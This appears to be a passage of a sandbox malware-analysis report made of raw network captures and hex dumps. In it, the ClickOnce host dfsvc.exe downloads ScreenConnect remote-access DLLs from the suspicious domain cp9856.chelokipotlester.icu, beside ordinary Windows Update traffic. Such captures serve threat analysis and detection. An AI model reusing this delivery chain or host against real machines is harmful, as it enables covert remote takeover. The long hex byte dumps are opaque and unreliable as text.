                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: 2c 0c 11 05 7b 49 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 11 0b 2a 00 41 64 00 00 02 00 00 00 a1 02 00 00 14 00 00 00 b5 02 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 f2 02 00 00 28 00 00 00 1a 03 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 9f 00 00 00 8d 02 00 00 2c 03 00 00 16 00 00 00 00 00 00 00 02 00 00 00 44 00 00 00 fe 02 00 00 42 03 00 00 0a 00 00 00 00 00 00 00 52 03 17 02 7b 63 01 00 04 02 7b 64 01 00 04 28 1a 04 00 06 2a 4e 03 02 7b 63 01 00 04 02 7b 64 01 00 04 28 1c 04 00 06 2a 00 00 00 13 30 04 00 ba 00 00 00 ee 00 00 11 12 00 0f 00 28 ce 00 00 0a 6b 0f 00 28 d2 00 00 0a 6b 28 96 07 00 0a 12 00 25 28 91 00 00 0a 04 5b 28 97 07 00 0a 12 00 25 28 93 00 00 0a 04 5b 28 98 07 00 0a 12 00 25 28 91 00 00 0a 0f 03 28 04 01 00 0a 6b 58
                                                                                                                                                                              Data Ascii: ,{Io",o"*Ad(,DBR{c{d(*N{c{d(*0(k(k(%([(%([(%((kX
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: 2b 2a 1e 02 7b 03 02 00 04 2a 22 02 03 7d 03 02 00 04 2a 1e 02 7b 04 02 00 04 2a 22 02 03 7d 04 02 00 04 2a 1e 02 7b 05 02 00 04 2a 22 02 03 7d 05 02 00 04 2a 1e 02 7b 06 02 00 04 2a 22 02 03 7d 06 02 00 04 2a 1e 02 7b 07 02 00 04 2a 22 02 03 7d 07 02 00 04 2a 1e 02 7b 08 02 00 04 2a 22 02 03 7d 08 02 00 04 2a 1e 02 7b 09 02 00 04 2a 22 02 03 7d 09 02 00 04 2a 1e 02 7b 0a 02 00 04 2a 22 02 03 7d 0a 02 00 04 2a 1e 02 7b 0b 02 00 04 2a 22 02 03 7d 0b 02 00 04 2a 1e 02 7b 0c 02 00 04 2a 22 02 03 7d 0c 02 00 04 2a 1e 02 7b 0d 02 00 04 2a 22 02 03 7d 0d 02 00 04 2a 1e 02 7b 0e 02 00 04 2a 22 02 03 7d 0e 02 00 04 2a 1e 02 7b 0f 02 00 04 2a 22 02 03 7d 0f 02 00 04 2a 1e 02 7b 10 02 00 04 2a 22 02 03 7d 10 02 00 04 2a 1e 02 7b 11 02 00 04 2a 22 02 03 7d 11 02 00
                                                                                                                                                                              Data Ascii: +*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: 25 02 7d 28 06 00 04 2a 00 13 30 05 00 aa 01 00 00 47 01 00 11 02 6f 93 09 00 0a 8d 4d 02 00 01 0a 02 6f 93 09 00 0a 8d 2a 02 00 01 0b 02 6f 93 09 00 0a 0c 04 4a 0d 04 4a 13 04 16 13 05 04 16 54 16 13 06 2b 5e 06 11 06 03 02 11 06 6f 94 09 00 0a 16 6f 95 09 00 0a 9e 09 2c 1c 02 11 06 6f 94 09 00 0a 75 25 00 00 02 13 07 11 07 2c 26 11 07 6f a7 01 00 06 2c 1d 07 11 06 17 9c 08 17 59 0c 11 04 06 11 06 94 59 13 04 04 04 4a 06 11 06 94 58 54 2b 09 11 05 06 11 06 94 58 13 05 11 06 17 58 13 06 11 06 02 6f 93 09 00 0a 32 98 38 04 01 00 00 11 04 6b 11 05 6b 5b 13 08 17 13 09 16 13 05 16 13 0a 08 13 0b 11 04 13 0c 2b 77 07 11 0a 91 2d 6b 11 0b 17 59 13 0b 11 09 2c 52 11 0b 2c 0b 06 11 0a 94 6b 11 08 5a 69 2b 02 11 0c 13 0d 11 0c 11 0d 59 13 0c 03 02 11 0a 6f 94 09
                                                                                                                                                                              Data Ascii: %}(*0GoMo*oJJT+^oo,ou%,&o,YYJXT+XXo28kk[+w-kY,R,kZi+Yo
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: ba 03 00 0a 02 7b ec 02 00 04 6f 8c 05 00 0a 6f fb 0a 00 0a 02 12 00 fe 15 f7 00 00 01 06 8c f7 00 00 01 28 5a 07 00 06 7e 88 02 00 04 25 2d 17 26 7e 81 02 00 04 fe 06 f4 06 00 06 73 fc 0a 00 0a 25 80 88 02 00 04 28 65 02 00 2b 26 02 12 01 fe 15 f8 00 00 01 07 8c f8 00 00 01 28 5b 07 00 06 02 7b ee 02 00 04 25 2d 16 26 02 02 fe 06 5c 07 00 06 73 fc 0a 00 0a 25 0c 7d ee 02 00 04 08 28 66 02 00 2b 26 02 12 03 fe 15 f9 00 00 01 09 8c f9 00 00 01 28 5b 07 00 06 26 02 12 04 fe 15 fa 00 00 01 11 04 8c fa 00 00 01 28 5b 07 00 06 26 17 13 05 73 5f 07 00 06 13 06 72 d8 46 00 70 12 05 28 ef 05 00 0a 72 5e 3c 00 70 28 4f 04 00 0a 16 28 26 01 00 0a 13 07 11 07 28 a8 00 00 0a 2d 6a 11 05 17 33 16 02 7b ec 02 00 04 6f 8c 05 00 0a 73 fe 0a 00 0a 6f a5 05 00 0a 26 11 06
                                                                                                                                                                              Data Ascii: {oo(Z~%-&~s%(e+&([{%-&\s%}(f+&([&([&s_rFp(r^<p(O(&(-j3{oso&


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.164972820.109.210.53443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:51 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                              2024-10-29 18:34:51 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Expires: -1
                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                              MS-CorrelationId: f658acde-e10a-4a2c-9079-266a6eae3456
                                                                                                                                                                              MS-RequestId: 320bcb14-6a5e-42bc-90ea-261b5e88bd8f
                                                                                                                                                                              MS-CV: UGfP7pMDgEa0eEVX.0
                                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:50 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 30005
                                                                                                                                                                              2024-10-29 18:34:51 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                              2024-10-29 18:34:52 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.164972937.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:55 UTC129OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:56 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 1716224
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:55 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:56 UTC16166INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0e 4c 8a 9b 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 28 1a 00 00 06 00 00 00 00 00 00 16 46 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 6c 63 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL" 0(F ` lc@
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 04 28 d0 01 00 0a 2a 00 00 00 01 10 00 00 02 00 7a 00 2d a7 00 2a 00 00 00 00 1b 30 05 00 09 01 00 00 3b 00 00 11 12 00 fe 15 c7 00 00 01 7e a9 00 00 04 25 2d 13 26 14 fe 06 6c 01 00 06 73 ec 01 00 0a 25 80 a9 00 00 04 7e aa 00 00 04 25 2d 13 26 14 fe 06 6d 01 00 06 73 72 01 00 0a 25 80 aa 00 00 04 02 16 16 8d d4 00 00 01 28 2e 00 00 2b 0b 03 25 2d 06 26 73 ed 01 00 0a 73 ee 01 00 0a 0c 07 28 3b 00 00 06 28 f6 00 00 06 6f ef 01 00 0a 0d 2b 34 12 03 28 f0 01 00 0a 72 cb 04 00 70 28 f1 01 00 0a 18 6f f2 01 00 0a 25 16 9a 13 04 17 9a 13 05 08 11 04 6f f3 01 00 0a 2d 0a 08 11 04 11 05 6f f4 01 00 0a 12 03 28 f5 01 00 0a 2d c3 de 0e 12 03 fe 16 50 00 00 1b 6f 11 00 00 0a dc 08 7e b3 00 00 04 25 2d 17 26 7e b0 00 00 04 fe 06 f6 02 00 06 73 f6 01 00 0a 25 80 b3
                                                                                                                                                                              Data Ascii: (*z-*0;~%-&ls%~%-&msr%(.+%-&ss(;(o+4(rp(o%o-o(-Po~%-&~s%
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 1a 28 83 03 00 06 80 f9 03 00 04 20 67 c5 52 6f 20 60 03 00 00 20 d2 4b 00 00 20 96 00 00 00 1f 17 20 cc 00 00 00 20 bf 00 00 00 1f 14 1f 21 20 c9 00 00 00 1f 39 73 20 03 00 0a 18 28 83 03 00 06 80 fa 03 00 04 20 67 c5 52 6f 20 60 03 00 00 20 d2 4b 00 00 20 96 00 00 00 1f 17 20 cc 00 00 00 20 bf 00 00 00 1f 14 1f 21 20 c9 00 00 00 1f 39 73 20 03 00 0a 1b 28 83 03 00 06 80 fb 03 00 04 20 67 c5 52 6f 20 60 03 00 00 20 d2 4b 00 00 20 96 00 00 00 1f 17 20 cc 00 00 00 20 bf 00 00 00 1f 14 1f 21 20 c9 00 00 00 1f 39 73 20 03 00 0a 1f 09 28 83 03 00 06 80 fc 03 00 04 20 67 c5 52 6f 20 60 03 00 00 20 d2 4b 00 00 20 96 00 00 00 1f 17 20 cc 00 00 00 20 bf 00 00 00 1f 14 1f 21 20 c9 00 00 00 1f 39 73 20 03 00 0a 1f 0a 28 83 03 00 06 80 fd 03 00 04 2a 22 02 03 28 21
                                                                                                                                                                              Data Ascii: ( gRo ` K ! 9s ( gRo ` K ! 9s ( gRo ` K ! 9s ( gRo ` K ! 9s (*"(!
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 01 00 11 00 e0 22 00 00 00 00 86 18 be 94 01 00 11 00 9c 23 00 00 00 00 91 00 8e 69 85 24 11 00 68 24 00 00 00 00 91 00 3a 55 90 24 14 00 7d 24 00 00 00 00 91 18 e9 94 96 24 16 00 89 24 00 00 00 00 81 00 29 0a 9a 24 16 00 92 24 00 00 00 00 86 08 ec 44 f3 04 17 00 9a 24 00 00 00 00 81 08 f7 44 f1 02 17 00 a3 24 00 00 00 00 86 08 f6 37 3d 00 18 00 ab 24 00 00 00 00 81 08 05 38 15 00 18 00 b4 24 00 00 00 00 86 08 3d 33 a0 24 19 00 bc 24 00 00 00 00 81 08 4d 33 a9 24 19 00 c8 24 00 00 00 00 c6 00 15 a2 b3 24 1a 00 f8 24 00 00 00 00 c6 00 1f 3f 89 01 1b 00 13 25 00 00 00 00 96 08 3c c9 b8 24 1b 00 1c 25 00 00 00 00 96 08 48 c9 b8 24 1d 00 28 25 00 00 00 00 96 00 e5 55 c0 24 1f 00 4b 25 00 00 00 00 96 00 b5 32 c8 24 21 00 78 25 00 00 00 00 96 00 70 31 d6 24 24
                                                                                                                                                                              Data Ascii: "#i$h$:U$}$$$)$$D$D$7=$8$=3$$M3$$$$?%<$%H$(%U$K%2$!x%p1$$
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: d8 57 10 10 03 00 42 98 00 00 01 00 eb 4a 00 00 02 00 d8 57 00 00 03 00 06 71 10 10 04 00 42 98 00 00 01 00 eb 4a 00 00 02 00 d8 57 00 00 01 00 86 45 00 00 01 00 c1 15 00 00 02 00 00 b4 00 00 03 00 96 31 00 00 01 00 49 3c 00 00 01 00 ba 6e 00 00 01 00 ba 6e 00 00 01 00 ba 6e 00 00 02 00 f4 9a 00 00 01 00 ba 6e 00 00 02 00 d3 c0 00 00 01 00 a3 8d 00 00 01 00 b9 60 10 10 02 00 ad c5 00 00 01 00 dd 9d 10 10 02 00 ad c5 00 00 01 00 df 9d 10 10 02 00 ad c5 00 00 01 00 df 9d 10 10 02 00 ad c5 00 00 01 00 fa c3 00 00 02 00 be 64 00 00 03 00 36 4b 00 00 01 00 be 64 00 00 02 00 36 4b 00 00 01 00 be 64 00 00 02 00 36 4b 00 00 01 00 1e 35 00 00 02 00 cf 57 00 00 03 00 4d 7d 00 00 01 00 df 47 00 00 02 00 b3 64 10 10 03 00 1e 35 10 10 04 00 cf 57 10 10 05 00 4d 7d 00
                                                                                                                                                                              Data Ascii: WBJWqBJWE1I<nnnn`d6Kd6Kd6K5WM}Gd5WM}
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 92 1e 09 00 d4 0e 1f 1a 09 00 d8 0e 24 1a 09 00 dc 0e ee 1c 09 00 e4 0e 1f 1a 09 00 e8 0e 24 1a 09 00 ec 0e 29 1a 09 00 f4 0e 7c 1b 09 00 f8 0e ee 1c 09 00 fc 0e d0 1c 09 00 00 0f 97 1e 09 00 04 0f 9c 1e 09 00 08 0f 0c 1d 09 00 0c 0f a1 1e 09 00 10 0f a6 1e 09 00 14 0f ab 1e 09 00 18 0f b0 1e 09 00 1c 0f b5 1e 09 00 20 0f ba 1e 09 00 24 0f bf 1e 09 00 28 0f c4 1e 09 00 60 0f 24 1a 09 00 68 0f 29 1a 09 00 6c 0f 72 1b 09 00 74 0f 1f 1e 09 00 78 0f 24 1a 09 00 7c 0f e8 1d 09 00 84 0f 24 1a 09 00 88 0f 29 1a 09 00 8c 0f 72 1b 09 00 90 0f 77 1b 09 00 94 0f 7c 1b 09 00 98 0f 81 1b 09 00 9c 0f 86 1b 09 00 a0 0f 8b 1b 09 00 a4 0f c9 1e 09 00 a8 0f b7 1c 08 00 d0 0f c5 1b 08 00 d4 0f 77 1b 08 00 d8 0f 7c 1b 06 00 20 10 ce 1e 06 00 24 10 d1 1e 08 00 b8 10 1f 1a 08
                                                                                                                                                                              Data Ascii: $$)| $(`$h)lrtx$|$)rw|w| $
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 00 61 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 00 69 6d 70 65 72 73 6f 6e 61 74 65 54 6f 6b 65 6e 46 72 6f 6d 53 65 73 73 69 6f 6e 49 44 00 73 65 74 5f 4c 6f 67 6f 6e 53 65 73 73 69 6f 6e 49 44 00 6c 6f 67 6f 6e 53 65 73 73 69 6f 6e 49 44 00 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 53 65 73 73 69 6f 6e 49 44 00 47 65 74 53 65 73 73 69 6f 6e 49 44 00 55 6e 6b 6e 6f 77 6e 43 6c 69 65 6e 74 53 65 73 73 69 6f 6e 49 44 00 3c 3e 33 5f 5f 73 65 73 73 69 6f 6e 49 44 00 67 65 74 5f 43 75 72 73 6f 72 49 44 00 70 43 6c 61 73 73 49 44 00 47 65 74 43 6c 61 73 73 49 44 00 70 72 6f 63 65 73 73 49 44 00 64 77 4f 62 6a 65 63 74 49 44 00 77 61 76 65 49 6e 47 65 74 49 44 00 77 49 44 00 4d 44 49 43 48 49
                                                                                                                                                                              Data Ascii: soleSessionIDactiveConsoleSessionIDimpersonateTokenFromSessionIDset_LogonSessionIDlogonSessionIDGetCurrentProcessSessionIDGetSessionIDUnknownClientSessionID<>3__sessionIDget_CursorIDpClassIDGetClassIDprocessIDdwObjectIDwaveInGetIDwIDMDICHI
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 54 65 72 6d 69 6e 61 74 65 00 49 6d 70 65 72 73 6f 6e 61 74 65 00 53 61 66 65 45 6e 75 6d 65 72 61 74 65 00 43 72 65 61 74 65 4c 6f 67 69 63 61 6c 54 68 72 65 61 64 53 74 61 74 65 00 44 65 6c 65 74 65 4c 6f 67 69 63 61 6c 54 68 72 65 61 64 53 74 61 74 65 00 53 77 69 74 63 68 49 6e 4c 6f 67 69 63 61 6c 54 68 72 65 61 64 53 74 61 74 65 00 53 77 69 74 63 68 4f 75 74 4c 6f 67 69 63 61 6c 54 68 72 65 61 64 53 74 61 74 65 00 47 65 74 4b 65 79 62 6f 61 72 64 53 74 61 74 65 00 66 53 74 61 74 65 00 47 65 74 53 74 72 65 61 6d 53 74 61 74 65 00 47 65 74 53 65 73 73 69 6f 6e 43 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 74 65 00 63 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 74 65 00 53 65 74 54 68 72 65 61 64 45 78 65 63 75 74 69 6f 6e 53 74 61 74 65 00 50 72 65 76 69 6f 75 73 53
                                                                                                                                                                              Data Ascii: TerminateImpersonateSafeEnumerateCreateLogicalThreadStateDeleteLogicalThreadStateSwitchInLogicalThreadStateSwitchOutLogicalThreadStateGetKeyboardStatefStateGetStreamStateGetSessionConnectionStateconnectionStateSetThreadExecutionStatePreviousS
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 69 73 74 69 63 73 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 70 72 6f 63 65 73 73 49 64 73 00 64 6d 46 69 65 6c 64 73 00 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 43 6f 6d 6d 61 6e 64 73 00 67 65 74 5f 4b 65 65 70 41 6c 69 76 65 54 69 6d 65 53 65 63 6f 6e 64 73 00 47 65 74 4b 65 65 70 41 6c 69 76 65 54 69 6d 65 53 65 63 6f 6e 64 73 00 67 65 74 5f 41 70 70 6c 69 63 61 74 69 6f 6e 50 69 6e 67 54 69 6d 65 53 65 63 6f 6e 64 73 00 67 65 74 5f 43 6c 69 65 6e 74 43 6f 6e 6e 65 63 74 69 6f 6e 4c 69 6d 69 74 50 65 72 69 6f 64 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 00 47 65 74 43 6c 69 65 6e 74 43 6f 6e 6e 65 63 74 69 6f 6e 4c 69 6d 69 74 50 65 72 69 6f 64 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 00 47 65 74 49 64 6c 65 4d 69 6c 6c 69 73 65 63 6f 6e 64 73
                                                                                                                                                                              Data Ascii: isticsSystem.DiagnosticsprocessIdsdmFieldsRunCommandLineCommandsget_KeepAliveTimeSecondsGetKeepAliveTimeSecondsget_ApplicationPingTimeSecondsget_ClientConnectionLimitPeriodMillisecondsGetClientConnectionLimitPeriodMillisecondsGetIdleMilliseconds
                                                                                                                                                                              2024-10-29 18:34:56 UTC16384INData Raw: 00 74 00 61 00 30 00 00 11 57 00 69 00 6e 00 6c 00 6f 00 67 00 6f 00 6e 00 00 1d 45 00 78 00 65 00 63 00 75 00 74 00 61 00 62 00 6c 00 65 00 50 00 61 00 74 00 68 00 00 17 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 4c 00 69 00 6e 00 65 00 00 05 5c 00 5c 00 00 47 54 00 72 00 75 00 6e 00 63 00 61 00 74 00 65 00 64 00 20 00 6f 00 75 00 74 00 70 00 75 00 74 00 20 00 61 00 74 00 20 00 7b 00 30 00 7d 00 20 00 63 00 68 00 61 00 72 00 61 00 63 00 74 00 65 00 72 00 73 00 2e 00 00 15 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 00 05 70 00 73 00 00 09 72 00 75 00 6e 00 2e 00 00 07 63 00 6d 00 64 00 00 07 70 00 73 00 31 00 00 0f 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 00 4b 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 50 00 6f 00 77 00 65 00 72 00 73 00
                                                                                                                                                                              Data Ascii: ta0WinlogonExecutablePathCommandLine\\GTruncated output at {0} characters.powershellpsrun.cmdps1cmd.exeKWindowsPowers


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.2.164973037.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:35:01 UTC102OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:35:01 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 531456
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:35:01 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:35:01 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1e 04 dc d5 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 14 08 00 00 06 00 00 00 00 00 00 86 2f 08 00 00 20 00 00 00 40 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 f3 38 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0/ @ 8@
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 07 8e 69 1d 31 17 06 07 1d 9a 16 28 23 00 00 2b 0c 12 02 28 72 01 00 0a 6f 31 02 00 06 07 8e 69 1e 31 0e 06 07 1e 9a 28 ec 03 00 06 6f 29 02 00 06 06 06 6f 22 02 00 06 2c 09 06 6f 22 02 00 06 8e 2d 03 18 2b 01 17 6f 19 02 00 06 05 2c 27 05 7e 0b 05 00 04 25 2d 13 26 14 fe 06 4e 02 00 06 73 6d 01 00 0a 25 80 0b 05 00 04 28 22 00 00 2b 06 28 47 02 00 06 06 2a 2e 73 14 02 00 06 80 8c 00 00 04 2a 00 1b 30 04 00 a0 00 00 00 38 00 00 11 02 2d 0b 72 b6 03 00 70 73 73 01 00 0a 7a 02 6f 1a 02 00 06 28 70 01 00 0a 2c 0b 72 d2 03 00 70 73 73 01 00 0a 7a 02 6f 1c 02 00 06 2d 0b 72 02 04 00 70 73 73 01 00 0a 7a 02 6f 20 02 00 06 28 93 03 00 06 2c 0b 72 32 04 00 70 73 73 01 00 0a 7a 02 6f 16 02 00 06 1f 64 33 0b 72 6a 04 00 70 73 73 01 00 0a 7a 02 6f 18 02 00 06 2d 0b
                                                                                                                                                                              Data Ascii: i1(#+(ro1i1(o)o",o"-+o,'~%-&Nsm%("+(G*.s*08-rpsszo(p,rpsszo-rpsszo (,r2psszod3rjpsszo-
                                                                                                                                                                              2024-10-29 18:35:01 UTC16384INData Raw: 00 04 25 2d 17 26 7e a2 05 00 04 fe 06 19 0e 00 06 73 c7 02 00 0a 25 80 a7 05 00 04 28 77 00 00 2b 2a 36 02 28 ef 03 00 06 03 28 f4 03 00 06 2a 36 02 28 78 00 00 2b 14 28 f4 03 00 06 2a 22 02 14 28 f4 03 00 06 2a 00 00 13 30 04 00 4b 00 00 00 00 00 00 00 02 7e a8 05 00 04 25 2d 17 26 7e a2 05 00 04 fe 06 1a 0e 00 06 73 c8 02 00 0a 25 80 a8 05 00 04 7e a9 05 00 04 25 2d 17 26 7e a2 05 00 04 fe 06 1b 0e 00 06 73 c9 02 00 0a 25 80 a9 05 00 04 28 79 00 00 2b 03 28 f4 03 00 06 2a 00 1b 30 02 00 8b 00 00 00 76 00 00 11 73 ca 02 00 0a 0a 17 0b 02 6f cb 02 00 0a 0c 2b 5f 08 6f cc 02 00 0a 0d 07 2c 04 16 0b 2b 0c 06 72 a3 0c 00 70 6f 16 02 00 0a 26 12 03 28 cd 02 00 0a 03 28 eb 03 00 06 13 04 06 11 04 6f 16 02 00 0a 26 12 03 28 ce 02 00 0a 2c 24 06 72 9f 0c 00 70
